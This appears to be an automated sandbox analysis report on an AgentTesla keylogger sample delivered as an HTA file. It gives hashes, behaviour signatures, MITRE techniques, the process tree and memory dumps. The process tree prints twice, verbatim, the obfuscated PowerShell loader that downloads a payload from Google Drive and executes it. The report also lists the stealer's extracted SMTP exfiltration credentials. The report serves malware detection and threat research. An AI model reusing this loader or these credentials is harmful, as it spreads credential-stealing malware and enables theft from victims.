agenttesla | 2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9

General

Target

2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9.hta
Size

68KB
MD5

7783fe86579a380bc61cdc4470dd0fc8
SHA1

8dd0213228872a897f604a19ea0eda3dfb85ae20
SHA256

2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9
SHA512

0aa925c3b6fb73f806198dc331778e5628b874ac359de3a99f15cc53f2999426d01b0c6d55821c54b14ca6c9cac1f762db909e49395f5dc2ce8f3a53f55a8dea
SSDEEP

192:giRpwijIw1govv2jEVUZDuEDMD+Y3Pet3pltqE6Nb6/0vOS2336SQ:dvS7ZvrS86S

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.bspskypark.com
Port:
587
Username:
[email protected]
Password:
B$pskypark002
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 2 IoCs

flow	pid	Process
15	4508	powershell.exe
17	4508	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation	mshta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
15	drive.google.com
26	drive.google.com
14	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
33	api.ipify.org
34	api.ipify.org
40	ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4728	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
976	powershell.exe
4728	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 976 set thread context of 4728	976	powershell.exe	99

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4508	powershell.exe
4508	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
4728	wab.exe
4728	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
976	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	976	powershell.exe
Token: SeDebugPrivilege	4728	wab.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 2932 wrote to memory of 4508	2932	mshta.exe	84
PID 2932 wrote to memory of 4508	2932	mshta.exe	84
PID 2932 wrote to memory of 4508	2932	mshta.exe	84
PID 4508 wrote to memory of 4012	4508	powershell.exe	92
PID 4508 wrote to memory of 4012	4508	powershell.exe	92
PID 4508 wrote to memory of 4012	4508	powershell.exe	92
PID 4508 wrote to memory of 976	4508	powershell.exe	95
PID 4508 wrote to memory of 976	4508	powershell.exe	95
PID 4508 wrote to memory of 976	4508	powershell.exe	95
PID 976 wrote to memory of 2864	976	powershell.exe	97
PID 976 wrote to memory of 2864	976	powershell.exe	97
PID 976 wrote to memory of 2864	976	powershell.exe	97
PID 976 wrote to memory of 4728	976	powershell.exe	99
PID 976 wrote to memory of 4728	976	powershell.exe	99
PID 976 wrote to memory of 4728	976	powershell.exe	99
PID 976 wrote to memory of 4728	976	powershell.exe	99
PID 976 wrote to memory of 4728	976	powershell.exe	99

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2b50c5df81cc4af7689262cabd209ffbefc2984566e4e8070f7135a40729ccb9.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2932
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$magni = 1;$Anteroexternal='S';$Anteroexternal+='ubstrin';$Anteroexternal+='g';Function Tllings($Sedated161){$Sangrel91=$Sedated161.Length-$magni;For($Ailing=1;$Ailing -lt $Sangrel91;$Ailing+=2){$Soljers+=$Sedated161.$Anteroexternal.Invoke( $Ailing, $magni);}$Soljers;}function rehearsed($Predrove){. ($Lepal) ($Predrove);}$Tobenedes45=Tllings 'AM o zYi l laa,/,5R. 0G (,W.iFnAdBoHwNsK NN T, .1I0,. 0 ;S KWsiMn,6F4s;D xD6H4,; Lrpv,: 1T2.1 .B0 )S DG,e.c kpoF/ 2B0.1 0.0.1.0B1M pFSiSr.eSf,oBx /S1F2T1l..0 ';$Vrinskedes=Tllings 'CUKs eSrU-NASg eCn,tU ';$Footcloths=Tllings 'Ch tIt pRs :F/./ dZr.iSv.e,..g o ocg l eP.BcbolmD/Pu.cC?Pe,x pKoZr.tI=pdSo w nGlKoLaGdu& iPdP= 1 uGs N,PSd xSZ 2 pWp e,lFK o,U N U.a vPcURDf,4S1AY SFM N v UAOGks ';$Parametrizing=Tllings ' >E ';$Lepal=Tllings 'TiSe xP ';$Adiantum201='Popularizes';rehearsed (Tllings ',S.e t.- CIo nAtPeFn,tA -,P aStShM VT.:v\.K a p iStNaslSf oKr kAl a,rAiPnLgSeCn ..t.xMtS ,- V aFlPu eA L$ AEd i aOnGtHu mS2K0,1 ; ');rehearsed (Tllings 'Ri.fU ,(Lt eGs,tL-.p aCt hI RT :.\TKNa p,iTtBa.lSfHo r kOlSa r.iUn.g e,n .Ot,xAt,)R{ e xSiHtD}O;T ');$Casual91 = Tllings ' eVc hMoA %.a p pFdKaDtua %,\ Ukn fIiBrPm a mKeMn.tGe,dC. J,a b ,&T&. Oe.c.hVo i$L ';rehearsed (Tllings 'D$Pg.l o b,a,lA:,U,nBvNa l,e.t.u,d,iRn aPrkyi=S(Tc m dU / c C$MCFa.sSu a lB9R1I)J ');rehearsed (Tllings ' $TgJl,oSb a lF: R uGtSe b.iEl = $BF oTo tAc lSoRt,h s,.EsAp lAi tO(C$CP.aIr aFmHeBt rVi.z i nSg )B ');$Footcloths=$Rutebil[0];rehearsed (Tllings 'R$IgslEoPbSaBlU:EUBn iMfSaDcRiFa lK= Nve wA- OOb jBe c,t, RS y s tsermU.FN eEt . WUeCb,CKl iNe.n,tG ');rehearsed (Tllings ' $,U n i f a cFi a l .SH,eKa dDe ras,[p$,V,rCi,nDs.k,eTdeeBs.]S=V$ATSo b.eFn e.d e s.4O5W ');$Mambos=Tllings 'MUFn.ijfraUc,i.atlF.bD.o.w n l o aMdSFPiUlUef(b$PFAo oSt cRlBoDt hksU,.$BT u,nTn,eClSe rIsC)F ';$Mambos=$Unvaletudinary[1]+$Mambos;$Tunnelers=$Unvaletudinary[0];rehearsed (Tllings 'P$.g.lbo bPaVlC:LUNdLsCtAi k.nJi n g,e rSsF= ( T eHs tU- P.ahtIhP U$NTMu nAn.eNlPe.r sW) ');while (!$Udstikningers) {rehearsed (Tllings ' $Ug,l oSb.a lS:BCYo,u,nAt e.rFmJotvJe,d = $At rUu e. ') ;rehearsed $Mambos;rehearsed (Tllings 'CSGtSaRrCt,-SS lFe,eDpr V4 ');rehearsed (Tllings 'B$Mg,lDocbNa.lD: UPd sUt ihk nCiAn.g.eOrDs = (IT e.s tS-EP,aBtFhM D$ T,u nUnSe lMezrKs )b ') ;rehearsed (Tllings ' $,g l.oDbaaSl :CN,eSaTp =M$SgEl,o b aUl :FtGe rFiSs,k,+K+M% $,RLu.tSeFbTiFlM. c o.u n,t. ') ;$Footcloths=$Rutebil[$Neap];}rehearsed (Tllings 'V$Cg l o.bAa.l.:US k n h.eFd,eSr sa =O GCeBtF-OC,o nHtCeSnRt A$DTPuLn,nRe.lOe.r s ');rehearsed (Tllings 'L$ gGlBo b aAl :DKBoqnGg,sGg a aMrUd.e nKek6E0 e=A D[MS yls t.eFm .gCbo.n.vRe.rGt ]K: :.FTr oHm BdaBs e.6O4 SStTrMiSnTg ( $FSBk.nEhEe dWeDr sA) ');rehearsed (Tllings ' $Dg l o b,a l,: PSlOo u gEh h.eAaPd =, H[.S,y s,t ePmR..TFe xUtm.SE nTc oVdsi nFgA]L:B: A SUC,I I,. G eLtSSMtMr,i nUgC( $ K oKnNgCs g aWaHr d e nSeC6 0C)T ');rehearsed (Tllings ' $,g.l ocb aTlA:,BAuBtPtPoBnGmSoSuTlfdV=H$mP lDoRuPgChThHe.a.d,.,s.uSb s t,rEiAn,gG( 3A5C3 0A3r3,,P2B7 7S2,9M), ');rehearsed $Buttonmould;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4508
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unfirmamented.Jab && echo $"
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$magni = 1;$Anteroexternal='S';$Anteroexternal+='ubstrin';$Anteroexternal+='g';Function Tllings($Sedated161){$Sangrel91=$Sedated161.Length-$magni;For($Ailing=1;$Ailing -lt $Sangrel91;$Ailing+=2){$Soljers+=$Sedated161.$Anteroexternal.Invoke( $Ailing, $magni);}$Soljers;}function rehearsed($Predrove){. ($Lepal) ($Predrove);}$Tobenedes45=Tllings 'AM o zYi l laa,/,5R. 0G (,W.iFnAdBoHwNsK NN T, .1I0,. 0 ;S KWsiMn,6F4s;D xD6H4,; Lrpv,: 1T2.1 .B0 )S DG,e.c kpoF/ 2B0.1 0.0.1.0B1M pFSiSr.eSf,oBx /S1F2T1l..0 ';$Vrinskedes=Tllings 'CUKs eSrU-NASg eCn,tU ';$Footcloths=Tllings 'Ch tIt pRs :F/./ dZr.iSv.e,..g o ocg l eP.BcbolmD/Pu.cC?Pe,x pKoZr.tI=pdSo w nGlKoLaGdu& iPdP= 1 uGs N,PSd xSZ 2 pWp e,lFK o,U N U.a vPcURDf,4S1AY SFM N v UAOGks ';$Parametrizing=Tllings ' >E ';$Lepal=Tllings 'TiSe xP ';$Adiantum201='Popularizes';rehearsed (Tllings ',S.e t.- CIo nAtPeFn,tA -,P aStShM VT.:v\.K a p iStNaslSf oKr kAl a,rAiPnLgSeCn ..t.xMtS ,- V aFlPu eA L$ AEd i aOnGtHu mS2K0,1 ; ');rehearsed (Tllings 'Ri.fU ,(Lt eGs,tL-.p aCt hI RT :.\TKNa p,iTtBa.lSfHo r kOlSa r.iUn.g e,n .Ot,xAt,)R{ e xSiHtD}O;T ');$Casual91 = Tllings ' eVc hMoA %.a p pFdKaDtua %,\ Ukn fIiBrPm a mKeMn.tGe,dC. J,a b ,&T&. Oe.c.hVo i$L ';rehearsed (Tllings 'D$Pg.l o b,a,lA:,U,nBvNa l,e.t.u,d,iRn aPrkyi=S(Tc m dU / c C$MCFa.sSu a lB9R1I)J ');rehearsed (Tllings ' $TgJl,oSb a lF: R uGtSe b.iEl = $BF oTo tAc lSoRt,h s,.EsAp lAi tO(C$CP.aIr aFmHeBt rVi.z i nSg )B ');$Footcloths=$Rutebil[0];rehearsed (Tllings 'R$IgslEoPbSaBlU:EUBn iMfSaDcRiFa lK= Nve wA- OOb jBe c,t, RS y s tsermU.FN eEt . WUeCb,CKl iNe.n,tG ');rehearsed (Tllings ' $,U n i f a cFi a l .SH,eKa dDe ras,[p$,V,rCi,nDs.k,eTdeeBs.]S=V$ATSo b.eFn e.d e s.4O5W ');$Mambos=Tllings 'MUFn.ijfraUc,i.atlF.bD.o.w n l o aMdSFPiUlUef(b$PFAo oSt cRlBoDt hksU,.$BT u,nTn,eClSe rIsC)F ';$Mambos=$Unvaletudinary[1]+$Mambos;$Tunnelers=$Unvaletudinary[0];rehearsed (Tllings 'P$.g.lbo bPaVlC:LUNdLsCtAi k.nJi n g,e rSsF= ( T eHs tU- P.ahtIhP U$NTMu nAn.eNlPe.r sW) ');while (!$Udstikningers) {rehearsed (Tllings ' $Ug,l oSb.a lS:BCYo,u,nAt e.rFmJotvJe,d = $At rUu e. ') ;rehearsed $Mambos;rehearsed (Tllings 'CSGtSaRrCt,-SS lFe,eDpr V4 ');rehearsed (Tllings 'B$Mg,lDocbNa.lD: UPd sUt ihk nCiAn.g.eOrDs = (IT e.s tS-EP,aBtFhM D$ T,u nUnSe lMezrKs )b ') ;rehearsed (Tllings ' $,g l.oDbaaSl :CN,eSaTp =M$SgEl,o b aUl :FtGe rFiSs,k,+K+M% $,RLu.tSeFbTiFlM. c o.u n,t. ') ;$Footcloths=$Rutebil[$Neap];}rehearsed (Tllings 'V$Cg l o.bAa.l.:US k n h.eFd,eSr sa =O GCeBtF-OC,o nHtCeSnRt A$DTPuLn,nRe.lOe.r s ');rehearsed (Tllings 'L$ gGlBo b aAl :DKBoqnGg,sGg a aMrUd.e nKek6E0 e=A D[MS yls t.eFm .gCbo.n.vRe.rGt ]K: :.FTr oHm BdaBs e.6O4 SStTrMiSnTg ( $FSBk.nEhEe dWeDr sA) ');rehearsed (Tllings ' $Dg l o b,a l,: PSlOo u gEh h.eAaPd =, H[.S,y s,t ePmR..TFe xUtm.SE nTc oVdsi nFgA]L:B: A SUC,I I,. G eLtSSMtMr,i nUgC( $ K oKnNgCs g aWaHr d e nSeC6 0C)T ');rehearsed (Tllings ' $,g.l ocb aTlA:,BAuBtPtPoBnGmSoSuTlfdV=H$mP lDoRuPgChThHe.a.d,.,s.uSb s t,rEiAn,gG( 3A5C3 0A3r3,,P2B7 7S2,9M), ');rehearsed $Buttonmould;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:976
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unfirmamented.Jab && echo $"
      4⤵
      PID:2864
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mmzntqa1.o3s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Unfirmamented.Jab

Filesize
495KB

MD5
e6d8c108a21b9069c94e6ec0a9c97c09

SHA1
bd2c70ea4fe821e802d20b1e01bab00be8a36d71

SHA256
db4cef19f055629af73bd763b8dc82327c48cdc9f2aefff8c6505732ddb04800

SHA512
0f6fe8c176acfe4daeb7d7fee41c053e77601a90a48abcefac9ebfa7b3ca5238f77e936fd5e801d1e55781399d301c003d7cc7d27eb1647d54a5dfdd9729dd16

Download Submit
memory/976-37-0x0000000008D50000-0x000000000AA40000-memory.dmp

Filesize
28.9MB

Download
memory/4508-22-0x00000000075C0000-0x0000000007656000-memory.dmp

Filesize
600KB

Download
memory/4508-2-0x0000000070D30000-0x00000000714E0000-memory.dmp

Filesize
7.7MB

Download
memory/4508-6-0x0000000005C60000-0x0000000005CC6000-memory.dmp

Filesize
408KB

Download
memory/4508-7-0x0000000005CD0000-0x0000000005D36000-memory.dmp

Filesize
408KB

Download
memory/4508-4-0x0000000070D30000-0x00000000714E0000-memory.dmp

Filesize
7.7MB

Download
memory/4508-17-0x0000000005F00000-0x0000000006254000-memory.dmp

Filesize
3.3MB

Download
memory/4508-18-0x0000000006320000-0x000000000633E000-memory.dmp

Filesize
120KB

Download
memory/4508-19-0x0000000006350000-0x000000000639C000-memory.dmp

Filesize
304KB

Download
memory/4508-20-0x0000000007B50000-0x00000000081CA000-memory.dmp

Filesize
6.5MB

Download
memory/4508-21-0x00000000068B0000-0x00000000068CA000-memory.dmp

Filesize
104KB

Download
memory/4508-0-0x0000000070D3E000-0x0000000070D3F000-memory.dmp

Filesize
4KB

Download
memory/4508-23-0x00000000074D0000-0x00000000074F2000-memory.dmp

Filesize
136KB

Download
memory/4508-24-0x0000000008780000-0x0000000008D24000-memory.dmp

Filesize
5.6MB

Download
memory/4508-5-0x0000000005370000-0x0000000005392000-memory.dmp

Filesize
136KB

Download
memory/4508-3-0x0000000005580000-0x0000000005BA8000-memory.dmp

Filesize
6.2MB

Download
memory/4508-39-0x0000000070D3E000-0x0000000070D3F000-memory.dmp

Filesize
4KB

Download
memory/4508-40-0x0000000070D30000-0x00000000714E0000-memory.dmp

Filesize
7.7MB

Download
memory/4508-41-0x0000000070D30000-0x00000000714E0000-memory.dmp

Filesize
7.7MB

Download
memory/4508-1-0x0000000004D90000-0x0000000004DC6000-memory.dmp

Filesize
216KB

Download
memory/4508-60-0x0000000070D30000-0x00000000714E0000-memory.dmp

Filesize
7.7MB

Download
memory/4728-57-0x0000000000F60000-0x0000000000FA2000-memory.dmp

Filesize
264KB

Download
memory/4728-56-0x0000000000F60000-0x00000000021B4000-memory.dmp

Filesize
18.3MB

Download
memory/4728-61-0x0000000021ED0000-0x0000000021F20000-memory.dmp

Filesize
320KB

Download
memory/4728-62-0x0000000021FC0000-0x0000000022052000-memory.dmp

Filesize
584KB

Download
memory/4728-63-0x0000000021F20000-0x0000000021F2A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing